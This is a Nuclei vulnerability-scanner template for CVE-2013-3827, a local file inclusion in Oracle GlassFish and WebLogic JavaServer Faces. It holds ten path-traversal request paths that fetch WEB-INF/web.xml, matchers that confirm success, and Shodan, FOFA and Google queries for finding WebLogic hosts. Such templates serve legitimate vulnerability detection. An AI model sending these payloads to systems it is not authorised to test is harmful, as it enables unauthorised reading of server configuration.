nuclei-templates/http/cves/2013/CVE-2013-3827.yaml

69 lines
2.8 KiB
YAML

id: CVE-2013-3827
info:
name: Javafaces LFI
author: Random-Robbie
severity: medium
description: An Unspecified vulnerability in the Oracle GlassFish Server component in Oracle Fusion Middleware 2.1.1, 3.0.1, and 3.1.2; the Oracle JDeveloper component in Oracle Fusion Middleware 11.1.2.3.0, 11.1.2.4.0, and 12.1.2.0.0; and the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0 and 12.1.1 allows remote attackers to affect confidentiality via unknown vectors related to Java Server Faces or Web Container.
remediation: |
Apply the latest patches and updates for the affected software to fix the LFI vulnerability.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2013-3827
- https://www.exploit-db.com/exploits/38802
- https://www.oracle.com/security-alerts/cpuoct2013.html
- http://www.oracle.com/technetwork/topics/security/cpuoct2013-1899837.html
- http://rhn.redhat.com/errata/RHSA-2014-0029.html
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
cvss-score: 5
cve-id: CVE-2013-3827
cwe-id: NVD-CWE-noinfo
epss-score: 0.64598
epss-percentile: 0.97602
cpe: cpe:2.3:a:oracle:fusion_middleware:2.1.1:*:*:*:*:*:*:*
metadata:
max-request: 10
vendor: oracle
product: fusion_middleware
shodan-query:
- http.title:"weblogic"
- http.html:"weblogic application server"
fofa-query:
- title="weblogic"
- body="weblogic application server"
google-query: intitle:"weblogic"
tags: cve,cve2013,edb,lfi,javafaces,oracle
http:
- method: GET
path:
- "{{BaseURL}}{{paths}}"
payloads:
paths:
- "/costModule/faces/javax.faces.resource/web.xml?loc=../WEB-INF"
- "/costModule/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
- "/faces/javax.faces.resource/web.xml?loc=../WEB-INF"
- "/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
- "/secureader/javax.faces.resource/web.xml?loc=../WEB-INF"
- "/secureader/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
- "/myaccount/javax.faces.resource/web.xml?loc=../WEB-INF"
- "/myaccount/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
- "/SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF"
- "/SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<web-app"
- "</web-app>"
condition: and
- type: status
status:
- 200
# digest: 4b0a00483046022100966b6b0b4a918a9f1fe55193d0249a46797f4a82799feecc379d2ede00c2f55d022100f685671f8e03e4877d9ea71c119d6f6ccfcb1303458bae06f08b9e555b5de2f3:922c64590222798bb761d5b6d8e72950